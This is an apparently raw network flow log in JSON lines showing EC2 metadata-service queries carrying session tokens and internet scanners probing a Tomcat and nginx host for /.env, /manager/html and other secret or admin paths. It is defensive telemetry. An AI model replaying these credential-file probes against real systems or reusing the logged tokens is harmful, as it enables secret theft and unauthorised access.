OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAP1CRVS1tjpXji3MANwBhSt_wyPZXvDwTmPGE7xgkwqbRd2opA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":48202,"status":200,"time_taken":300,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T01:01:59.870625Z","timestamp":"2022-04-06T01:01:59.870423Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 01:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"1470f198-2531-490b-808b-86fa83303b31","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAMHr09WiViH8hFV4lyplO-LP7NHqTW8lfup9BeJkiBPS5iPPrQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":34370,"status":404,"time_taken":224,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T01:01:59.869821Z","timestamp":"2022-04-06T01:01:59.869563Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 00:20:43 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 01:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"1ec0e1c3-915b-4142-bc05-ab58660403da","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAMHr09VOF1BL7x0NyXaYZbON2WsM-Z1qkaWfGchcMfNC4DtPOA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":34368,"status":200,"time_taken":309,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T01:00:34.192489Z","timestamp":"2022-04-06T01:00:34.192489Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"54fe0fe0-745e-4d5d-aa4c-89c3d02bf492","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.115","src_mac":"02:A5:92:DA:49:85","src_port":32950,"time_taken":182996,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T00:57:49.263840Z","timestamp":"2022-04-06T00:57:49.261870Z","bytes":1414,"bytes_in":169,"bytes_out":1245,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /script

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1089\r\nDate: Wed, 06 Apr 2022 00:57:49 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1089,"flow_id":"7230df03-503b-405d-8542-4beee3915d16","http_comment":"HTTP/1.1 404 ","http_content_length":1089,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /script HTTP/1.1","src_headers":"GET /script HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"209.141.40.224","src_mac":"02:A5:92:DA:49:85","src_port":58448,"status":404,"time_taken":41361,"transport":"tcp","uri":"/script","uri_path":"/script"} {"endtime":"2022-04-06T00:44:16.811214Z","timestamp":"2022-04-06T00:44:16.811214Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"2821941d-5837-418e-97a6-46e4fd266751","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.218","src_mac":"02:A5:92:DA:49:85","src_port":42470,"time_taken":191000,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T00:40:28.776203Z","timestamp":"2022-04-06T00:40:28.774429Z","bytes":2286,"bytes_in":192,"bytes_out":2094,"cs_content_length":0,"dest_content":"\n\n\n\n Apache Tomcat\n\n\n\n

It works !

\n\n

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

\n \n

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

\n\n

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

\n\n

You might consider installing the following packages, if you haven't already done so:

\n\n

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

\n\n

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

\n\n

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

\n\n

NOTE: For security reasons, using the manager webapp is restricted to users with role \"manager-gui\". The host-manager webapp is restricted to users with role \"admin-gui\". Users are defined in /etc/tomcat9/tomcat-users.xml.

\n\n\n\n","dest_headers":"HTTP/1.1 200 \r\nAccept-Ranges: bytes\r\nETag: W/\"1895-1649171235548\"\r\nLast-Modified: Tue, 05 Apr 2022 15:07:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 1895\r\nDate: Wed, 06 Apr 2022 00:40:28 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1895,"flow_id":"068d4934-f9d0-4d05-a8cf-63a665295819","http_comment":"HTTP/1.1 200 ","http_content_length":1895,"http_content_type":"text/html","http_method":"GET","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET / HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7\r\nContent-Length: 0\r\n\r\n","src_ip":"92.115.143.116","src_mac":"02:A5:92:DA:49:85","src_port":36826,"status":200,"time_taken":205403,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T00:18:02.579405Z","timestamp":"2022-04-06T00:18:02.576393Z","bytes":2280,"bytes_in":186,"bytes_out":2094,"cs_content_length":0,"dest_content":"\n\n\n\n Apache Tomcat\n\n\n\n

It works !

\n\n

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

\n \n

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

\n\n

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

\n\n

You might consider installing the following packages, if you haven't already done so:

\n\n

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

\n\n

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

\n\n

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

\n\n

NOTE: For security reasons, using the manager webapp is restricted to users with role \"manager-gui\". The host-manager webapp is restricted to users with role \"admin-gui\". Users are defined in /etc/tomcat9/tomcat-users.xml.

\n\n\n\n","dest_headers":"HTTP/1.1 200 \r\nAccept-Ranges: bytes\r\nETag: W/\"1895-1649171235548\"\r\nLast-Modified: Tue, 05 Apr 2022 15:07:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 1895\r\nDate: Wed, 06 Apr 2022 00:18:02 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1895,"flow_id":"300e709f-28a7-46c6-a204-d7940b074c2c","http_comment":"HTTP/1.1 200 ","http_content_length":1895,"http_content_type":"text/html","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET / HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36\r\nContent-Length: 0\r\n\r\n","src_ip":"80.91.116.209","src_mac":"02:A5:92:DA:49:85","src_port":45754,"status":200,"time_taken":187831,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T00:16:35.432624Z","timestamp":"2022-04-06T00:16:35.432624Z","bytes":160,"bytes_in":160,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"file_size":1,"flow_id":"1e8f567a-880b-4c5f-aadd-e32e50b43042","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.0","src_content":"\u0000","src_headers":"GET / HTTP/1.0\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\r\nAccept: */*\r\n\r\n","src_ip":"139.162.190.203","src_mac":"02:A5:92:DA:49:85","src_port":24384,"time_taken":0,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T00:16:25.276645Z","timestamp":"2022-04-06T00:16:25.276645Z","bytes":160,"bytes_in":160,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"file_size":1,"flow_id":"1e8f567a-880b-4c5f-aadd-e32e50b43042","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.0","src_content":"\u0000","src_headers":"GET / HTTP/1.0\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\r\nAccept: */*\r\n\r\n","src_ip":"139.162.190.203","src_mac":"02:A5:92:DA:49:85","src_port":24384,"time_taken":0,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T00:16:10.136120Z","timestamp":"2022-04-06T00:16:10.136120Z","bytes":160,"bytes_in":160,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"file_size":1,"flow_id":"1e8f567a-880b-4c5f-aadd-e32e50b43042","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.0","src_content":"\u0000","src_headers":"GET / HTTP/1.0\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\r\nAccept: */*\r\n\r\n","src_ip":"139.162.190.203","src_mac":"02:A5:92:DA:49:85","src_port":24384,"time_taken":159273,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T00:13:06.384702Z","timestamp":"2022-04-06T00:13:06.384702Z","bytes":44,"bytes_in":44,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":8089,"flow_id":"63ba3c06-42c5-4af2-b2b7-b076e4e22511","http_method":"GET","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246:8089","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246:8089\r\n\r\n","src_ip":"167.94.138.61","src_mac":"02:A5:92:DA:49:85","src_port":40096,"time_taken":79663,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T00:11:42.449091Z","timestamp":"2022-04-06T00:11:42.448874Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 00:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"6d931960-7715-4014-8835-729892daf564","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAFBF9KDkIWPWS6Q6l-pn37lZdhM9jOVi85ZZMxQcmck_xZeWGA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":27132,"status":404,"time_taken":229,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T00:11:42.448367Z","timestamp":"2022-04-06T00:11:42.447896Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Tue, 05 Apr 2022 23:12:23 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 00:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"9b330dfd-47e7-4eba-bc32-c3aee7fbc4a8","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAFBF9KCF5m4b0i9vs9BP2y0HfqBxoV2c8wfOFdD6SyVAqQ57VQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":27130,"status":200,"time_taken":490,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T00:07:03.498435Z","timestamp":"2022-04-06T00:07:03.496307Z","bytes":2132,"bytes_in":38,"bytes_out":2094,"dest_content":"\n\n\n\n Apache Tomcat\n\n\n\n

It works !

\n\n

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

\n \n

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

\n\n

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

\n\n

You might consider installing the following packages, if you haven't already done so:

\n\n

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

\n\n

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

\n\n

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

\n\n

NOTE: For security reasons, using the manager webapp is restricted to users with role \"manager-gui\". The host-manager webapp is restricted to users with role \"admin-gui\". Users are defined in /etc/tomcat9/tomcat-users.xml.

\n\n\n\n","dest_headers":"HTTP/1.1 200 \r\nAccept-Ranges: bytes\r\nETag: W/\"1895-1649171235548\"\r\nLast-Modified: Tue, 05 Apr 2022 15:07:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 1895\r\nDate: Wed, 06 Apr 2022 00:07:03 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1895,"flow_id":"09a8351d-3076-414c-a549-d93944206233","http_comment":"HTTP/1.1 200 ","http_content_length":1895,"http_content_type":"text/html","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"54.218.192.0","src_headers":"GET / HTTP/1.1\r\nHost: 54.218.192.0\r\n\r\n","src_ip":"64.62.197.32","src_mac":"02:A5:92:DA:49:85","src_port":49500,"status":200,"time_taken":23043,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T00:02:36.227562Z","timestamp":"2022-04-06T00:02:36.227562Z","bytes":86,"bytes_in":86,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"2e3a51e1-8ea4-4797-b1af-eef50924bd12","http_method":"GET","http_user_agent":"l9tcpid/v1.1.0","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-Agent: l9tcpid/v1.1.0\r\nConnection: close\r\n\r\n","src_ip":"161.35.86.181","src_mac":"02:A5:92:DA:49:85","src_port":40346,"time_taken":157237,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T00:02:35.815642Z","timestamp":"2022-04-06T00:02:35.815484Z","bytes":363,"bytes_in":54,"bytes_out":309,"dest_content":"\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx/1.21.5
\r\n\r\n\r\n","dest_headers":"HTTP/1.1 400 Bad Request\r\nServer: nginx/1.21.5\r\nDate: Wed, 06 Apr 2022 00:02:35 GMT\r\nContent-Type: text/html\r\nContent-Length: 157\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"file_size":[28,157],"flow_id":"3c902380-d5a7-4a00-abef-4e71a203d03e","http_comment":"HTTP/1.1 400 Bad Request","http_content_length":157,"http_content_type":"text/html","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","server":"nginx/1.21.5","src_content":"HELP\r\nEHLO leakix.net\r\n?\r\n\r\n","src_headers":"GET / HTTP/1.1\r\n\r\n","src_ip":"161.35.86.181","src_mac":"02:A5:92:DA:49:85","src_port":40148,"status":400,"time_taken":153444,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T00:02:14.368103Z","timestamp":"2022-04-06T00:02:14.365153Z","bytes":1430,"bytes_in":175,"bytes_out":1255,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /manager/html

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1099\r\nDate: Wed, 06 Apr 2022 00:02:14 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1099,"flow_id":"1adfc506-d842-466d-b296-255a297f170a","http_comment":"HTTP/1.1 404 ","http_content_length":1099,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /manager/html HTTP/1.1","src_headers":"GET /manager/html HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"178.62.196.118","src_mac":"02:A5:92:DA:49:85","src_port":40882,"status":404,"time_taken":165248,"transport":"tcp","uri":"/manager/html","uri_path":"/manager/html"} {"endtime":"2022-04-06T00:02:06.079803Z","timestamp":"2022-04-06T00:02:06.079505Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 00:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"0023d83c-f3d6-4ceb-b050-dc7000922547","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAP1CRVRorSyLxtg_Pnwm56i08-K-Cj7YppRAn-CH_QIQbdOu4w==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":48882,"status":404,"time_taken":315,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T00:02:06.079015Z","timestamp":"2022-04-06T00:02:06.078725Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Tue, 05 Apr 2022 23:03:34 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 00:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"ead779e3-0e7f-49f6-96ca-5d1189a3fb6f","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAP1CRVS1tjpXji3MANwBhSt_wyPZXvDwTmPGE7xgkwqbRd2opA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":48880,"status":200,"time_taken":316,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T00:01:59.870063Z","timestamp":"2022-04-06T00:01:59.869878Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 00:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"15ee8095-9a42-42b6-b68a-3a7414764480","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAMHr09WiViH8hFV4lyplO-LP7NHqTW8lfup9BeJkiBPS5iPPrQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":60258,"status":404,"time_taken":204,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} 